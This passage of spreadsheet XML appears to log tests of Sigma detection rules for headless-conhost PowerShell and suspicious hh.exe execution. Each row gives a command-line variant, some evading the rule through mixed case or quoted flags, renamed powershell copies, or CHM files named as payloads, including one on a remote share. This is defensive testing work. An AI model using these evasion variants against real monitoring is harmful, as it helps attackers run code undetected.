      <c r="D1493" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1493" s="36" t="inlineStr">
        <is>
          <t>conhost.exe /"-headless" pwsh.exe -COmMANd "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1493" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1493" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1493" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1493" s="36" t="n"/>
      <c r="J1493" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1493" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1494" ht="15.75" customHeight="1" s="42">
      <c r="A1494" s="36" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B1494" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1494" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1494" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1494" s="36" t="inlineStr">
        <is>
          <t>conhost.exe --HeAdleSS pwsh.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1494" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1494" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1494" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1494" s="36" t="n"/>
      <c r="J1494" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1494" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1495" ht="15.75" customHeight="1" s="42">
      <c r="A1495" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B1495" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1495" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1495" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1495" s="36" t="inlineStr">
        <is>
          <t>conhost.exe --HeAdLEss pwsh.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1495" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1495" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1495" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1495" s="43" t="n"/>
      <c r="J1495" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1495" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1496" ht="15.75" customHeight="1" s="42">
      <c r="A1496" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B1496" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1496" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1496" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1496" s="36" t="inlineStr">
        <is>
          <t>conhost.exe -"-headless" pwsh.exe -"Command" "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1496" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1496" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1496" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1496" s="43" t="n"/>
      <c r="J1496" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1496" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1497" ht="15.75" customHeight="1" s="42">
      <c r="A1497" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B1497" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1497" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1497" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1497" s="36" t="inlineStr">
        <is>
          <t>conhost.exe -"-headless" pwsh.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1497" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1497" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1497" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1497" s="43" t="n"/>
      <c r="J1497" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1497" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1498" ht="15.75" customHeight="1" s="42">
      <c r="A1498" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B1498" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1498" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1498" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1498" s="36" t="inlineStr">
        <is>
          <t>conhost.exe --headless pwsh.exe /"Command" "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1498" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1498" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1498" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1498" s="43" t="n"/>
      <c r="J1498" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1498" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1499" ht="15.75" customHeight="1" s="42">
      <c r="A1499" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B1499" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1499" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1499" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1499" s="36" t="inlineStr">
        <is>
          <t>conhost.exe --HeAdlESs pwsh.exe -cOmMand "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1499" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1499" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1499" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1499" s="36" t="n"/>
      <c r="J1499" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1499" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1500" ht="15.75" customHeight="1" s="42">
      <c r="A1500" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B1500" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1500" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1500" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1500" s="36" t="inlineStr">
        <is>
          <t>conhost.exe --headless pwsh.exe -"Command" "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1500" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1500" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1500" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1500" s="36" t="n"/>
      <c r="J1500" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1500" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1501" ht="15.75" customHeight="1" s="42">
      <c r="A1501" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B1501" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1501" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1501" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1501" s="36" t="inlineStr">
        <is>
          <t>conhost.exe /"-headless" pwsh.exe -COmmAnd "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1501" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1501" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1501" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1501" s="36" t="n"/>
      <c r="J1501" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1501" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1502" ht="15.75" customHeight="1" s="42">
      <c r="A1502" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B1502" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1502" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1502" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1502" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\sys.exe &amp;&amp; conhost.exe --headless C:\Temp\sys.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1502" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1502" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1502" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1502" s="36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1502" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1502" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1503" ht="15.75" customHeight="1" s="42">
      <c r="A1503" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B1503" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1503" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1503" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1503" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\sys.exe &amp;&amp; conhost.exe -"-headless" C:\Temp\sys.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1503" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1503" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1503" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1503" s="36" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1503" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1503" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1504" ht="15.75" customHeight="1" s="42">
      <c r="A1504" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B1504" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1504" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1504" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1504" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\sys.exe &amp;&amp; conhost.exe --hEADlEsS C:\Temp\sys.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1504" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1504" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1504" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1504" s="36" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1504" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1504" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1505" ht="15.75" customHeight="1" s="42">
      <c r="A1505" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B1505" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1505" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1505" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1505" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\sys.exe &amp;&amp; conhost.exe /"-headless" C:\Temp\sys.exe /"Command" "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1505" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1505" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1505" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1505" s="36" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1505" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1505" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1506" ht="15.75" customHeight="1" s="42">
      <c r="A1506" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B1506" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1506" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1506" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1506" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\sys.exe &amp;&amp; conhost.exe --HeADLeSS C:\Temp\sys.exe /"Command" "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1506" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1506" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1506" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1506" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1506" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1506" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1507" ht="15.75" customHeight="1" s="42">
      <c r="A1507" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B1507" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1507" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1507" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1507" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\sys.exe &amp;&amp; conhost.exe --hEAdlESS C:\Temp\sys.exe -CommAnd "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1507" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1507" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1507" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1507" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1507" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1507" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1508" ht="15.75" customHeight="1" s="42">
      <c r="A1508" s="43" t="n"/>
      <c r="B1508" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1508" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1508" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1508" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\malicious.chm</t>
        </is>
      </c>
      <c r="F1508" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1508" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1508" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1508" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1508" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1508" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1509" ht="15.75" customHeight="1" s="42">
      <c r="A1509" s="43" t="n"/>
      <c r="B1509" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1509" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1509" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1509" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\help_document.chm</t>
        </is>
      </c>
      <c r="F1509" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1509" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1509" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1509" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1509" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1509" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1510" ht="15.75" customHeight="1" s="42">
      <c r="A1510" s="43" t="n"/>
      <c r="B1510" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1510" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1510" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1510" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\APPDAT~1\Local\Temp\malicious.chm</t>
        </is>
      </c>
      <c r="F1510" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1510" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1510" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1510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10" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1510" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1511" ht="15.75" customHeight="1" s="42">
      <c r="A1511" s="43" t="n"/>
      <c r="B1511" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1511" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1511" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1511" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\Windows\System32\oobe\msoobe.chm</t>
        </is>
      </c>
      <c r="F1511" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1511" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1511" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1511" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1511" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1511" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1512" ht="15.75" customHeight="1" s="42">
      <c r="A1512" s="43" t="n"/>
      <c r="B1512" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1512" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1512" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1512" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\document.chm</t>
        </is>
      </c>
      <c r="F1512" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1512" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1512" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1512" s="36" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1512" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1512" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1513" ht="15.75" customHeight="1" s="42">
      <c r="A1513" s="43" t="n"/>
      <c r="B1513" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1513" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1513" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1513" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1513" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1513" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1513" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1513" s="36" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1513" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1513" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1514" ht="15.75" customHeight="1" s="42">
      <c r="A1514" s="43" t="n"/>
      <c r="B1514" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1514" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1514" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1514" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1514" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1514" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1514" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1514" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1514" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1514" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1515" ht="15.75" customHeight="1" s="42">
      <c r="A1515" s="43" t="n"/>
      <c r="B1515" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1515" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1515" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1515" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1515" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1515" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1515" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1515" s="43" t="n"/>
      <c r="J1515" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1515" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1516" ht="15.75" customHeight="1" s="42">
      <c r="A1516" s="36" t="n"/>
      <c r="B1516" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1516" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1516" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1516" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1516" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1516" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1516" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1516" s="43" t="n"/>
      <c r="J1516" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1516" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1517" ht="15.75" customHeight="1" s="42">
      <c r="A1517" s="36" t="n"/>
      <c r="B1517" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1517" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1517" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1517" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update_help.chm</t>
        </is>
      </c>
      <c r="F1517" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1517" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1517" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1517" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1517" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1517" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1518" ht="15.75" customHeight="1" s="42">
      <c r="A1518" s="36" t="n"/>
      <c r="B1518" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1518" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1518" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1518" s="36" t="inlineStr">
        <is>
          <t>hh.exe \\192.168.1.100\share\payload.chm</t>
        </is>
      </c>
      <c r="F1518" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1518" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1518" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1518" s="43" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1518" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1518" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1519" ht="15.75" customHeight="1" s="42">
      <c r="A1519" s="36" t="n"/>
      <c r="B1519" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1519" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1519" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1519" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update.chm</t>
        </is>
      </c>
      <c r="F1519" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1519" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1519" s="36" t="b">
